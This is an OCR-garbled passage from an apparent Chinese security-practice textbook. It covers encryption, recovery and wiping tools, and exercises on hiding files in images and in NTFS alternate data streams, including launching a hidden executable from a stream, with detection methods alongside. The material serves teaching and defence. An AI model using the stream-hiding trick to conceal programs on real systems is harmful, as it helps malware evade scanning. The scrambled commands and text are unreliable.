Gez zoogle. con DO_NOT_TRUST Fid. 
C khns0. google. com DO_NOT_TRUST_Fid. 
khns!. google.com  DO_NOT_TRUST_Fid. 
Cmaps. google.com DO NOT_TRUST_Fid. 
Es]ssps gstatic.com DO _NOT_TRUST Fid. 
mt :0. google. con DO NOT_TRUST Fid. 颁发 给 : Administrator 
re x= š 


MRE: — Administrator 


证 书 的 预期 目的 有 效 起 始 日 期 2013-9-12 到 2113-8-19 
MEXER P 黎 有 一 个 与 这 证书 对 应 的 私 钥 。 


图 9-3 下 浏览 器 中 的 数字 证 书 


图 9-3 中 包含 各 级 证 书 发 布 机 构 的 数字 证 书 .如 khms0. google. com 是 google 的 地 图 
瓦 片 服务 器 ,是 个 可 信任 网 站 。 可 以 实现 导入 、 导 出 和 删除 操作 。 

目前 64 位 Windows 操作 系统 加 载 驱动 时 需要 Verisign 微软 代码 签名 证 书 ,由 于 驱动 
的 功能 强大 ,木马 和 杀毒 软件 皆 使 用 驱动 加 载 进入 系统 内 核 来 获取 或 修改 系统 信息 ,因此 代 
码 签名 极 大 地 提升 了 系统 的 安全 性 和 稳定 性 ,但 也 使 第 三 方 的 软件 安装 很 不 方便 。 

3) 数据 处 理 软件 

数据 安全 处 理 包括 数据 加 密 、 数 据 恢复 和 数据 擦 除 , 下 面 分 别 介 绍 TrueCrypt 数据 加 
密 、EasyRecovery 数据 恢复 以 及 Eraser 数据 擦 除 这 三 款 软 件 。 

(1) TrueCrypt。 

2008 年 巴西 执法 机 构 指 控 巴 西 银行 家 Daniel Dantas 金融 犯罪 ,收缴 了 5 个 硬盘 。 使 
用 了 两 种 加 密 程序 ,一 种 是 TrueCrypt, 另 一 种 是 不 知名 的 256 位 AES 加 密 软 件 。 巴 西 现 
有 的 法 律 中 不 存在 强制 要 求 Dantas 交 出 密码 的 规定 。 在 巴西 专家 未 能 破解 密码 后 ,巴西 
政府 在 2009 年 年 初 请 求 美国 提供 帮助 ,然而 美国 FBI 在 一 年 不 成 功 的 尝试 后 ,退还 了 
硬盘 。 

TrueCrypt 是 一 款 免 费 开 源 的 加 密 软 件 , 支 持 Windows Vista/Windows 7/Windows 
XP、Mac OS X, Linux 等 操作 系统 。TrueCrypt 不 需要 生成 任何 文件 即 可 在 硬盘 上 建立 虚 
拟 磁 盘 , 用 户 可 以 按照 盘 符 进行 访问 ,所 有 虚拟 磁盘 上 的 文件 都 被 自动 加 密 , 需 要 通过 密码 
来 进行 访问 。 

TrueCrypt 提供 多 种 加 密 算 法 ,包括 AES-256、 Blowfish (448-bit key)、CAST5、 
Serpent, Triple DES 和 Twofish, 支持 FAT32 和 NTFS 分 区 、 隐 藏 卷 标 、 热 键 启动 等 。 
TrueCrypt 的 功能 如 下 。 

© 所 有 加 密 都 是 以 分 区 为 基础 的 。 

© 所 有 加 密 数 据 都 是 经 过 AES 等 加 密 算 法 的 运算 后 的 结果 ,无 法 破解 ( 穷 举 法 除外 ) 。 

© 能 创建 加 密 的 “虚拟 磁盘 文件 ”( 类 似 虚 拟 光 驱 , 大 小 可 以 自 定 义 ) 。 


© 加 密 单 个 分 区 或 整个 硬盘 。 

© 加 密 Windows 系统 所 在 的 分 区 (启动 Windows 前 需要 密码 ) 。 

加 密 过 程 自动 .实时 、 透 明 (使 用 加 密 文件 或 分 区 前 输入 密码 , 载 和 人 后 就 可 以 像 使 用 
一 个 普通 分 区 一 样 使 用 加 密 分 区 ) 。 

D 提供 两 级 方案 ,以 应 对 被 强迫 说 出 密码 的 情况 (如 抢劫 ) 。 

各 隐藏 分 区 (覆盖 式 密码 术 ,steganography) 、 隐 藏 操作 系统 。 

a EERME TrueCrypt 加 密 分 区 (加 密 数 据 会 被 认为 是 随机 数据 ) 。 

@ 加 密 算 法 。 为 取得 更 好 的 加 密 效 果 , 可 以 同时 使 用 两 种 或 三 种 加 密 算法 。 操 作 模 式 
是 XTS。 

@ 多 样 化 的 身份 认证 。 

名 支持 通常 使 用 的 密码 认证 。 

避 支 持 密 匙 文件 认证 ,通过 指定 的 文件 作为 密 匙 对 数据 加 密 。 密 是 文件 支持 任何 类 型 

的 文件 ,计算 机 上 那么 多 文件 ,要 是 想 尝试 暴力 破解 ,会 非常 烦琐 。 

名 支持 PKCS 11 运行 库 , 可 以 使 用 硬件 口令 卡 (例如 U 盾 ) 进 行 加 密 认 证 。 密 钥 随 身 

携带 ,从 而 再 次 提高 了 数据 的 安全 性 ,以 此 实现 更 高 规格 的 防暴 力 破解 。 

(2) EasyRecovery, 

EasyRecovery 是 世界 著名 数据 恢复 公司 Ontrack 的 技术 产品 。 其 Professioanl (专业 ) 
版 包括 磁盘 诊断 ,数据 恢复 ,文件 修复 `E-mail 修复 等 全 部 四 大 类 目 19 个 项 目的 各 种 数据 文 
件 修复 和 磁盘 诊断 方案 ,能 够 恢复 丢失 的 数据 以 及 重建 文件 系统 ,恢复 过 程 中 不 会 向 原始 驱 
动 器 写 人 任何 东西 ,主要 是 在 内 存 中 重建 文件 分 区 表 使 数据 能 够 安全 地 传输 到 其 他 驱动 器 
中 。 可 以 从 被 病毒 破坏 或 是 已 经 格式 化 的 硬盘 中 恢复 数据 ,可 以 恢复 大 于 8. AGB 的 硬盘 ， 
支持 长 文件 名 ,被 破坏 的 硬盘 中 像 丢失 的 引导 记录 、BIOS 参数 数据 块 . 分 区 表 、FAT 表 、 引 
导 区 都 可 以 由 它 来 进行 恢复 。 

EasyRecovery 能 够 恢复 的 文件 类 型 包括 : 图 片 (. bmp .gif 等 ), 应 用 程序 (. exe), 
Office 文档 文件 (. doc、. xls、. ppt 等 ), 网 页 文件 (. htm、 asp 等 ), 开 发 文档 (. c.. cpp 、 
. CXX、.h 等 ) ,数据 备份 文档 (. bak、. dat 等 )。 

(3) Eraser。 

普通 的 删除 文件 方式 并 没有 经 过 特殊 人 处理 ,系统 只 是 把 文件 分 配 表 中 的 文件 名 删除 ,而 
真正 的 数据 还 在 硬盘 上 ,通过 恢复 软件 就 能 很 容易 把 已 经 删除 的 文件 恢复 回来 。 所 以 要 真 
正 地 删除 文件 ,就 得 要 用 软件 对 文件 进行 特殊 处 理 , 也 就 是 擦 除 。 原 理 就 是 把 硬盘 上 原 
来 存在 文件 的 位 置 用 另外 的 数据 覆盖 一 次 或 多 次 ,这 样 恢 复 软件 就 没 法 恢复 出 原来 的 文 
件 了 。 

Eraser 是 一 款 美国 国防 部 计算 机 磁盘 痕迹 清除 器 ,可 以 彻底 删除 文件 ,文件 夹 , 以 及 清 
除 驱 动 器 未 用 磁盘 空间 ,但 不 影响 未 删除 文件 的 工具 软件 .也 可 以 彻底 清除 以 前 删除 文件 的 
任何 痕迹 。 支 持 最 高 的 Gutmann( 古 特 曼 ) 算 法 35 次 擦 除 ,同时 还 内 建 了 符合 美国 防 部 国 
U. S. DOD 5220. 22-M 标准 的 U. S. DOD 5220. 22-M(C and E) 擦 除 算法 ,可 以 彻底 防止 软 
件 和 硬件 恢复 工具 的 恢复 。 程 序 同时 也 内 置 了 防止 软件 恢复 且 速 度 快 的 Pseudorandom 
Data( 伪 随机 数据 覆盖 ) 算 法 ,另外 软件 允许 用 户 自己 定制 擦 除 算法 。 具 体 功能 如 下 。 

O 彻底 删除 文件 。 


实践 教程 


© 擦 除 回收 站 内 的 删除 文件 。 

© 清除 驱动 器 未 用 磁盘 空间 (不 影响 未 删除 的 文件 ) 。 

@ 可 以 彻底 清除 以 前 删除 文件 的 任何 痕迹 。 

O 具有 系统 集成 .计划 任务 等 功能 ,支持 系统 外 壳 , 支 持 文件 拖 放 ,以 方便 用 户 使 用 。 

4) 数据 安全 建议 

数据 安全 威胁 包括 丢失 AN DR ERRES, KEEF. 

(1) 重要 文件 要 多 点 备份 。 

坚持 不 把 鸡蛋 放 在 一 个 篮子 里 的 原则 。 一 定 要 把 重要 的 数据 存储 在 两 个 以 上 独立 的 设 
备 或 介质 上 。 例 如 ,计算 机 里 存 一 份 ,U 盘 或 移动 硬盘 里 存 一 份 ,再 刻 到 光盘 上 一 份 。 私 密 
数据 的 存放 最 好 与 网 络 分 开 。 

(2) 私密 数据 要 加 密 存放 。 

数据 加 密 存放 能 有 效 地 防止 被 自 改 ,窃取 ,利用 诸如 TrueCrypt 的 加 密 软 件 加 密 和 隐秘 
存放 私密 数据 ,可 以 避免 门 事件 的 发 生 。 

(3) 私密 文件 要 安全 擦 除 。 

用 操作 系统 提供 的 删除 功能 删除 的 文件 可 以 被 恢复 ,为 了 防止 删除 的 私密 文件 被 恶意 
恢复 ,建议 用 文件 粉碎 机 之 类 的 专用 工具 如 Eraser 删除 。 

(4) 数据 丢失 处 理 。 

对 于 误 操 作 、 系 统 崩 溃 .病毒 破坏 造成 的 数据 丢失 ,可 以 尝试 利用 软件 来 恢复 。 例 如 带 有 
Windows PE 系统 并 集成 一 些 DOS 工具 的 可 引导 光盘 FINAL DATA 、ActiveUNDELETE 以 
及 EasyRecovery 等 专用 工具 。 需 要 注意 的 是 误 删 文件 要 防止 被 覆盖 ,避免 恢复 失败 。 


5. 实践 操作 及 步骤 


1) 文件 隐藏 

方法 一 : copy 命令 隐藏 。 

使 用 copy 命令 将 一 个 或 多 个 文件 隐藏 在 某 个 文件 之 下 ,步骤 如 下 。 

(1) 将 要 隐藏 的 文件 用 WinRAR 或 360 压缩 软件 压缩 为 一 个 压缩 包 如 hidefile. rar。 

(2) 准备 一 个 文件 如 图 片 word 文档 等 名 为 “演示 . jpg”, 将 两 个 文件 hidefile. rar 和 “ 演 
示 . jpg” 存 放 到 同一 目录 下 ,如 E:\test。 

G) 启动 CMD 命令 行 终端 ,用 cd 命令 切换 路 径 至 下 :\test 下 ,输入 以 下 命令 。 


C:\Documents and Settings\Administrator > E: 
E:\>cd test 

E:\test > copy /b 演示 . jpg + hidefile. rar 演示 . jpg 
演示 .JPG 

hidefile. rar 


已 复制 IFLA 


Copy /b 命令 将 压缩 文件 hidefile. rar 就 附加 在 “演示 . jpg” 文 件 中 ,而 “演示 . jpg” 图 片 
可 以 打开 和 浏览 , 当 把 jpg 的 扩展 名 改 为 rar 时 ,用 WinRAR 或 360 压缩 软件 打开 就 能 看 到 
文件 hidefile. rar 中 压缩 的 内 容 。 
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方法 二 : 流 文 件 隐藏 。 

(1) 文本 隐藏 。 

所 谓 流 文 件 是 指 文件 中 的 数据 是 一 串 字 符 , 没 有 结构 。 在 NTFS 文件 系统 下 ， 
件 都 可 以 存在 多 个 数据 流 , 除 了 主 文件 流 以 外 还 可 以 有 许多 非 文件 流 寄 宿 在 主 文件 中 。 
使 用 资源 派生 来 维持 与 文件 相关 的 信息 ,虽然 无 法 看 到 数据 流 文件 ， 的 
系统 中 的 。NTFS 数据 流 本 身 是 NTFS 文件 格式 中 的 一 种 正常 功能 ,但 是 却 可 以 被 一 些 木 
马 病毒 所 利用 ,很 多 文件 病毒 就 趁 此 机 会 ,利用 NTFS 
数据 流 将 自己 完全 隐藏 在 系统 中 ,普通 的 扫描 方式 是 
无 法 扫描 出 来 的 。 当 然 NTFS 数据 流 也 利于 帮助 隐藏 
一 些 重要 的 信息 和 文件 ,步骤 如 下 。 

O 假设 E 盘 的 文件 系统 NTFS 格式 如 图 9-4 所 | 8 ame 
示 , 在 下 盘 下 创建 一 个 1. txt 的 文本 文档 ,里 面 输入 数 
据 * 这 是 一 个 主 文件 ” 

@ 把 重要 信息 ， 如 密码 作为 流 文件 隐藏 在 这 个 主 文件 1. txt 内 ,在 CMD 命令 行 下 
输入 : 


Fbi (E:) 属性 


图 9-4 E 盘 属性 


E:\> echo "密码 password:123456" >> 1. txt:2. txt 


给 流 文件 取 名 为 2. txt, 资 源 管理 器 中 只 显示 1. txt 而 不 会 显示 2. txt。 
@ 在 资源 管理 器 中 双击 1. txt, 只 能 看 到 1. txt 中 原 有 的 内 容 , 如 图 9-5(a) 所 示 。 只 有 
在 CMD 命令 行 下 输入 “notepad 1. txt:2. txt”, 则 可 以 打开 如 图 9-5(b) 所 示 的 记事 本 内 容 。 


Bitt- a ORE ete s OOR 


XEO RED 格式 @) EV ZPD WAD HTO 查看 HHW 


帮助 “密码 password:123456 ” 
这 是 一 个 主 文件 


(a) 1.txt 中 的 内 容 (b) 1.txt:2.txt 中 的 内 容 


图 9-5 1.txt 和 1. txt:2. txt 内 容 


打开 任务 管理 器 ,可 以 看 到 两 个 任务 ,如 图 9-6(a) 所 示 。 还 可 以 继续 向 流 文件 来 存 
储 新 的 数据 ,在 CMD 命令 行 下 输入 命令 "echo 这 是 发 送 的 私密 数据 之 之 1. txt:2. txt”, 则 
如 图 9-3(b) 所 示 , 也 可 以 直接 在 打开 的 流 文件 中 输入 新 的 数据 ,这 和 普通 记事 本 一 样 ,但 只 
能 “保存 ”而 不 能 “ 另 保存 为 ”。 


| 局 Tinaows 任务 管理 器 
XEO WO SEV SOV V EHW 


1.txt:2.txt - 记事 本 DER 


= XPO REO 格式 @) SEV #RbQD 
m s In [un Ime “密码 、 password:123456 ” 
ES 状态 这 是 发 送 的 秘密 数据 
Biot- 记事 本 正在 运行 
et 正在 运行 


(a) 任务 管理 器 (b) 新 增 的 数据 
图 9-6 流 文件 新 增 数 据 示 例 
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可 以 用 echo 命令 将 流 文件 文本 依附 在 任何 格式 的 文件 中 ,如 图 片 、 网 页 、 视 频 、 音 频 、 
exe 程序 等 ,命令 “echo 这 是 发 送 的 私密 数据 二 二 A. exe:2. txt”, 则 输入 命令 “notepad A. 
exe:2. txt” 可 以 查看 该 流 文件 文本 。 

甚至 文件 夹 下 也 可 以 附加 流 文件 。 在 巨 盘 下 创建 一 个 test 文件 夹 , 输 入 : 


EE:\> echo 这 是 发 送 的 私密 数据 >> e:\test:2. txt" 
E:\> notepad e:\test:2. txt 


请 测试 其 他 格式 的 文件 。 

(2) 程序 隐藏 。 

CMD 命令 type 将 文件 作为 流 文件 寄宿 在 主 文件 ,其 功能 比 echo 更 强大 ,而 命令 start 
可 以 执行 流 文件 程序 ,实践 操作 如 下 。 

O 图 片 附加 到 文本 文件 中 ,输入 命令 行 “type 1. jpg >>1 txt:1.jpg”, 查 看 的 命令 行 
为 “mspaint 1. txt:1.jpg”。 将 1. txt 替换 E:Ntest, 则 图 片 附加 到 文件 夹 中 。 

© 向 E:Nl.txt 文件 里 面 寄 宿 一 个 exe 程序 ,输入 命令 行 “type 1. exe >> 1. txt:1 
.exe”, 启 动 1. txt 中 的 寄宿 程序 ,输入 命令 行 “start E:\1. txt:1. exe”, W) 1. exe 启动 起 来 ， 
同样 将 1. txt 替换 E:Ntest, 则 流 文件 程序 寄宿 到 文件 夹 中 。 

© 向 下 盘 中 一 个 不 存在 的 主 文件 里 面 寄 宿 一 个 流 文件 , 即 “type 1. exe 之 二 none:1 
.exe”, 则 输入 后 下 盘 中 多 了 一 个 none 的 无 扩展 名 文件 。 

备注 : 

(1) 带 有 流 文件 的 主 文件 只 能 在 本 机 复制 ,但 是 当 复 制 主 文件 到 其 他 机 器 上 时 ,所 携带 
的 流 文件 会 丢失 ,这 是 因为 复制 用 到 的 copy 命令 不 支持 流 文件 ,函数 ReadFile 可 以 实现 部 
分 功能 ,具体 请 看 实践 10。 

(2) 只 有 Windows XP 系统 下 ,命令 start 能 启动 e:\1. txt:1. exe, Il] fE Windows 7 下 
命令 start 无 效 , 但 可 以 用 其 他 方法 实现 。 

隐藏 流 文件 检测 方法 如 下 。 

(1) 右键 主 文件 1. txt 的 属性 查看 , 则 1. txt 大 小 显示 和 附加 流 文件 前 没有 不 同 ,但 是 
压缩 1. txt 时 可 以 发 现 大 小 变化 了 。 步 又 : 右 击 并 选择 “添加 到 压缩 文件 ”一 “高 级 ”, 勾 选 
“保存 文件 流 数据 ,再 进行 压缩 ,如 图 9-7 所 示 。 如 果 不 保存 ,那么 已 经 存在 1. txt 里 面 的 流 
文件 就 会 丢失 。 


š 压 笃 文 件 名 和 和 参数 


常规] 高 级 [进项 [文件 | 备份 | 时间 | 注释 


资源 管理 器 O NTFS 选项 恢复 记录 a 
打开 四 ) 口 保存 文件 安全 数据 人) oa)» 
ORFIFARE T 


(a) (b) 
9-7 勾 选 “保存 文件 流 数 据 ” 


(2) 将 下 盘 下 的 主 文件 1. txt( 存 在 NTFS 数据 流 的 文件 1. exe) 复 制 到 FAT32 分 区 
上 ,如 图 9-8(a) 中 所 示 的 C 盘 , 弹 出 “确定 数据 流 丢 失 ” 对 话 框 并 显示 “1. exe $ DATA”, 如 


图 9-8(b) 所 示 , 单 击 “是 ?按钮 则 丢失 流 文件 ,只 复制 主 文件 。 


名 称 a 文件 系统 Esg 
| mP C:) FAT32 本 地 磁盘 
本 地 磁盘 0:) NIFS 本 地 磁盘 
< 本 地 磁盘 E) NIFS 本 地 磁盘 
< 本 地 磁盘 F) NFS 本 地 磁盘 
FRE (6:) NTFS 本 地 磁盘 


(人 ) 
图 9-8 “确认 数据 流 丢失 ”对 话 框 


(3) 使 用 第 三 方 工具 检测 流 文件 ,如 lads. exe, streams. exe, ScanNTFS 等 。 例 如 用 
lads. exe 扫描 NTFS 数据 流 文件 。 在 CMD 命令 行 下 ,切换 路 径 至 lads 工具 所 在 目录 下 ,使 


用 方法 如 下 。 


E:\lads > lads e:\3 
LADS — Freeware version 4.10 
(C) Copyright 1998 - 2007 Frank Heyne Software (http://www. heysoft. de) 
This program lists files with alternate data streams (ADS) 
Use LADS on your own risk! 
Scanning directory e:\3\ 
size ADS in file 
901662 e:\3\:1.exe 
901662 bytes in 1 ADS listed 


上 面 显示 文件 夹 E:\3\ 中 隐藏 着 流 文件 1. exe。ScanNTFS 是 图 形 化 的 工具 软件 ,使 用 
更 加 方便 ,streams 和 lads 都 是 命令 行 模式 ,其 命令 格式 如 下 。 


streams - s c, // 扫 描 c 盘 下 的 流 文件 
streams — de:\3 // 删 除 件 夹 E:\3\ 中 的 流 文件 


(4) 假定 知道 流 文件 名 字 的 前 提 下 ,在 CMD 命令 行 下 ,切换 路 径 至 WinHex 工具 所 在 
目录 下 ,输入 命令 行 “winhex e:\1. txt:1. exe”. W) WinHex 窗口 显示 出 流 文件 1. exe 的 二 进 


制 数据 ,如 图 9-9 所 示 。 


SyinHex - [1.txt:1.exe] 


文件 外 SEO 搜索 G) (EQ) NIV IA 


Offset 06 í 2 3 4 5S 6 7 
00000000 ÜBp sA 90 00 03 00 00 00 
00000010 B8 00 OD DO 00 00 00 00 
00000020 00 00 00 00 00 00 00 00 


File size: 0.9 MB 
901,652 bytes 


9-9 WinHex 打开 流 文件 


图 9-9 中 前 两 个 字 节 4D5A 表明 这 是 一 个 可 执行 文件 。 
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2) Word 文档 保护 

利用 数字 证 书 鉴定 Word 文档 的 完整 性 ,用 保护 文档 的 功能 禁止 对 文档 内 容 修改 和 复 
制 。 用 到 工具 makecert、cert2spc 和 pvkimprt, 步 骤 如 下 。 

(1) 自制 数字 证 书 。 

第 一 步 ,用 makecert 工具 创建 一 个 自我 签署 的 X. 509 证 书 (. cer) 和 一 个 . pvk 私 钥 文 
件 ,CMD 命令 下 ,路 径 切换 makecert 文件 所 在 的 目录 下 ,输入 下 面 CMD 命令 。 


>makecert -r -nn"CN= znufe" -b 01/01/2014 - e 01/01/2018 - sv znufe. pvk znufe. cer 


其 中 “CN 二 znufe” 是 数字 证 书 的 显示 名 称 。 按 提示 设置 私 钥 密 码 , 随 后 在 当前 目录 下 
生成 新 文件 znufe. pvk 和 znufe. cer。 

第 二 步 , 用 cert2spc 工具 利用 X. 509 证 书 (. cer) 创 建 发 行者 证 书 (. spe), CMD 命令 
如 下 。 


> cert2spc znufe, cer znufe. spc 


第 三 步 ,用 pvkimprt 工具 从 . pvk 和 . spc 格式 转换 成 . pfx 格式 ,CMD 命令 如 下 。 
> pvkimprt -pfx znufe. spc znufe. pvk 


按 提示 操作 导出 . pfx 证 书 。 若 第 一 步 设置 了 私 钥 密 码 ,此 处 需要 输入 验证 。 

(2) H. pfx 证书 导 入 IE. 

启动 下 浏览 器 ,依次 打开 菜单 项 “工具 ”一 “Internet 选项 ”~“ 内 容 ” 选 项 卡 一 证书” 一 
“导入 ”, 打 开 * 证 书 导 入 向 导 ”, 在 “文件 选择 ?对 话 框 中 ,设置 文件 类 型 如 图 9-10 所 示 。 

确定 后 数字 证 书 znufe 导入 到 “个 人 ”证 书 集 
中 ,通过 “查看 ”按钮 可 以 查看 证 书 细节 ，。 

(3) 保护 文档 。 

打开 要 保护 的 Word 文档 ,打开 菜单 项 “ 工 
有 具 ”一 下 拉 菜 单 “ 保 护 文档 ”, 在 右 侧 栏 的 “编辑 限制 "处 选择 * 仅 允许 在 文档 中 进行 此 类 编辑 ” 
复 选 框 ,在 下 拉 列 表 中 选择 “填写 窗 体 ”, 再 单 击 “是 ,启动 强制 保护 ”按钮 ,设置 密码 ,这 样 文 
档 即 可 防止 被 复制 或 更 改 , 如 图 9-11 所 示 。 


文件 名 加 
文件 类 型 1): 


图 9-10 ”证书 文件 类 型 


15 15291092 5 19 FH 


TIEG 


启动 强制 保护 
保护 方法 
OBW 
(向 道 密码 的 用 户 可 以 删除 文档 保护 。 文档 没 有 加 密 。) 
新 密码 MH W: | 


确 兴 新 密码 P): 
用 户 验 证 立 ) 
公 难 证 的 所 有 者 可 以 册 除 文档 保护 。 文档 访 加 空 并 局 用 
“不 能 分 皮 ”。) 


C s= Ca J 


图 9-11 保护 文档 


下 一 步 为 文档 导入 数字 证 书 znufe, 可 以 防止 保护 密码 被 破解 后 文档 被 修改 ,打开 菜单 
项 “工具 ”一 下 拉 菜 单 “ 选 项 ”, 则 打开 “选项 ”对 话 框 ,选择 “安全 性 ”选项 卡 ,如 图 9-12(a) 所 示 
单 击 “数字 签名 ”按钮 ,添加 数字 证 书 znufe, 则 在 文档 下 方 的 状态 栏 中 间 出 现 数字 证 书 的 标 
志 如 图 9-12(b) 所 示 , 如 果 修 改 了 文档 ,该 标志 即 可 消失 。 


拼写 和 语法 | 修订 | 用户 信息 | 兼容 性 
视图 | 70 | 编辑 | 打印 
此 文档 的 文件 加 窗 选 项 
打开 文件 时 的 密码 中) : 
此 文档 的 文件 共享 选项 
修改 文件 时 的 密码 W: 
口 建 议 以 只 读 方式 打开 文档 色 ) 

ET 

BEEN 

ORTALE REPARARE G) 

器 打印 、 保 存 或 发 送 包 含 修订 或 批注 的 文件 之 前 给 出 敬告) 
器 存储 用 于 增强 合并 司 确 性 的 随机 编号 T) 

回 打开 或 保存 时 标记 可 见 中 


ERSE 
Casas E iE a +， 并 指 


图 9-12 数字 证 书 保护 


3) 数据 加 密 

通过 TrueCrypt 软件 可 以 在 计算 机 的 一 个 地 方 (例如 下 盘 ) 创 建 一 个 指定 大 小 的 “ 文 
件 保险 柜 ? ,如 图 9-13 所 示 。 在 打开 下 盘 时 这 个 文件 保险 柜 显 示 成 一 个 普通 的 文件 (例如 
图 中 一 个 10MB 的 qqq. wav 的 音频 文件 ,可 以 取 任 何 扩展 名 ) ,但 是 无 法 直接 打开 ,因为 
这 只 是 一 种 外 表 的 隐 饰 。 可 以 把 它 看 成 是 一 个 10MB 大 小 (大 小 可 以 设 定 ) 的 文件 保 

由 TrueCrypt 将 这 个 文件 保险 柜 (qqq. wav) 加 载 到 计算 机 中 变 成 一 个 盘 符 , 例 如 O 盘 。 
之 后 可 以 通过 像 访问 其 他 盘 (C 盘 、D 盘 等 ) 一 样 访问 它 及 往 它 里 面 放 入 文件 。 一旦 在 
TrueCrypt 中 关闭 这 个 文件 保险 柜 ( 或 者 设 定 一 定时 间 不 访问 它 会 自动 关闭 ) ,就 不 能 访问 
这 个 文件 保险 柜 的 文件 了 。TrueCrypt 加 密 软件 看 成 是 它 生 成 的 加 密 保 险 柜 的 大 门 。 下 面 
演示 qqq. wav 文件 保险 柜 的 实现 过 程 。 

(1) 创建 新 的 加 密 卷 。 单 击 图 9-13 中 Create Volume 按钮 .进入 创建 向 导 如 图 9-14(a~g) 
所 示 。 

图 (a) : 创建 文件 加 密 卷 (默认 ) ,加 密 非 系统 分 区 或 扩展 磁盘 ,加 密 系统 分 区 或 整个 系 
统 磁盘 , 单 击 Next 按钮 。 

图 (b): 创建 标准 加 密 卷 ( 默 认 ) ,创建 隐藏 加 密 卷 。 所 谓 隐 藏 加 密 卷 是 指 解决 如 果 有 
人 强迫 你 说 出 加 密 文 件 密码 (如 受到 折磨 ) ,而 你 不 得 不 说 的 情况 , 即 在 某 一 已 有 的 标准 
加 密 卷 中 创建 隐藏 加 密 卷 , 也 就 是 说 你 说 出 标准 加 密 卷 的 密码 时 不 会 显示 隐藏 加 密 卷 的 
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cH D E 盘 | | | | eee 


图 9-13 文件 保险 柜 


内 容 。 

图 (c) : 选择 一 个 文件 作为 加 密 卷 名 称 ,如 qaq. wav, 

图 (d) : 选择 加 密 算法 。 

图 (e): 设置 加 密 卷 大 小 ,如 10MB。 

图 (1D) : 设置 加 密 卷 的 密码 。 

图 (g): 设置 加 密 卷 的 文件 系统 ,如 NTFS, 

在 图 9-14(h) 中 给 出 加 密 卷 qqq. wav 的 属性 信息 ,大 小 为 10MB, 不 会 显示 其 中 包含 的 
隐藏 卷 ( 如 100MB) 信 息 。 

(2) 单 击 图 9-13 中 Mount 加 载 按钮 ,弹出 如 图 9-15 所 示 的 密码 输入 框 。 

如 果 输 入 的 是 标准 加 密 卷 密码 则 加 载 标准 加 密 卷 ,如 图 9-16(a) 所 示 的 Normal, 如 果 输 
入 的 是 隐藏 加 密 卷 密码 则 加 载 隐藏 加 密 卷 ,如 图 9-16(b) 所 示 的 Hidden, 

(3) 加 密 卷 加 载 后 ,就 能 通过 打开 O 盘 访 问 加 密 卷 中 的 文件 ,如 图 9-17 所 示 。 单 击 图 
9-13 中 Dismount All 按钮 可 以 印 载 加 密 卷 。 

4) 数据 恢复 

利用 EasyRecovery 恢复 已 经 被 删除 的 文件 ,在 360 软件 粉碎 实践 文件 后 ,测试 能 否 被 
EasyRecovery 恢复 。 


TrueCrypt Volume Creation Wizard 


& create an encrypted the coatamer 
Creates a wrna goed am miton a fke. Recommender 


Volume Type 


© standard TrueCrypt volume 
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Free space on drive E:\ is 19.36 GB 


Rame Tety me tae of the contant vou ant aaa 
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Note wat we newnan posable am of a FAT vome a 29218. 
kupa 


(e) 


Random Pook: 7066085085907E55E0747381CEETBED F 
heade vey: 


图 9-14 创建 新 加 密 卷 向 导 
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9-17 ”访问 加 密 卷 中 的 文件 


(1) 删除 文件 。 本 例 中 用 永久 删除 或 文件 粉碎 机 粉碎 D 盘 中 的 D:\test\test. jpg 3X 
件 , 如 图 9-18 所 示 。 


< @ CUT D) » test 


ZAA 8D SEV) IAM 


testjpg 
项 目 类 型 : JPEG 图 像 
分 级 : 未 分 级 


u 尺寸 1024 x 960 
一 大 小 174 KB 


图 9-18 删除 文件 


(2) 打开 EasyRecovery Enterprise 数据 恢复 界面 ,如 图 9-19 所 示 。 


第 1 选取 媒体 类 型 
ARMEA tE *iaBey8it- 根据 他 的 迁 择 ， 程 序 可 以 优化 收 页 进香 。 


= 了 
a EP 
Ere 内 存 设备 光 媒 体 kia Sid RAID 系统 


从 内 部 硬 盘 袁 其他 大 容量 存 结 设备 mi paweypaAqia , ssp AR hEN- 
PE ERRNO RE ELA h RE 


| 
T EAA: ser om / am (45.63 ) ASAE: 1.446 / 2 29; (sz 63 区 — 


9-19 数据 恢复 界面 


第 1 步 : 选取 媒体 类 型 。 图 9-19 中 “硬盘 驱动 器 "用 于 恢复 硬盘 数据 (默认 选项 ),“ 内 存 
设备 ”用 于 恢复 内 存 卡 如 SD 卡 中 的 数据 ,“ 光 媒体 ”用 于 恢复 CD,DVD 等 光盘 数据 “多 媒 
体 /移动 设备 "用 于 恢复 U 盘 等 设备 数据 ,“RAID 系统 "用 于 从 RAID 系统 中 恢复 数据 。 实 
践 中 是 删除 硬盘 中 的 文件 ,直接 单 击 “ 继 续 ” 按 钮 即 可 。 图 9-19 中 工具 栏 的 “选项 ”按钮 ,用 
于 设置 恢复 的 条 件 , 可 以 加 快 扫描 的 速度 ,如 图 9-20 所 示 设 置 “文件 类 型 ”", 如 设置 只 恢复 
“图 像 文件 ”。 

第 2 步 : 选择 要 扫描 的 卷 。 如 图 9-21 所 示 ,选择 恢复 数据 的 盘 符 为 D。 

第 3 步 : 选择 “删除 文件 恢复 ”选项 ,如 图 9-22 所 示 。 

第 4 步 : 显示 所 有 设置 的 信息 ,确定 后 则 进入 扫描 恢复 。 


实践 教程 


图 9-20 “选项 "对话 框 
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图 9-21 选择 恢复 的 盘 符 


第 3 选择 恢复 方案 


说 工具 
e n E a a a 
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图 9-22 ”选择 恢复 选项 


第 5 步 : 扫描 恢复 ,显示 被 删除 或 被 粉碎 的 文件 D:\test\test. jpg 已 经 被 恢复 出 来 ,如 
图 9-23 所 示 。 
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9-23 数据 扫描 恢复 


图 9-24 显示 格式 化 U 盘 , 测 试 EasyRecovery 恢复 功能 。 第 1 步 在 图 9-19 中 选择 “多 
媒体 /移动 设备 ”, 第 3 步 在 图 9-21 中 选择 “格式 化 媒体 恢复 ”, 其 他 操作 基本 一 样 。 


EB F2SI-Archive.rar" 并 E-mail 


格式 化 (A)- 
弹出 由 
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fast kas Q) 
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重 命名 (M) gbt 975f46527 
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"m kina EOS 
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图 9-24 格式 化 口 盘 


测试 结果 能 把 格式 化 后 的 U 盘 中 的 数据 恢复 过 来 。 一 般 防止 数据 被 恶意 恢复 的 措施 
有 使 用 安全 删除 软件 删除 或 用 垃圾 数据 反复 覆盖 ,如 反复 往 U 盘 、 移 动 硬盘 中 写 和 人 非 隐私 
文件 ,或 数码 相机 在 删除 隐私 相片 之 后 继续 多 拍 几 张 照片 来 覆盖 数据 。 

5) 数据 擦 除 

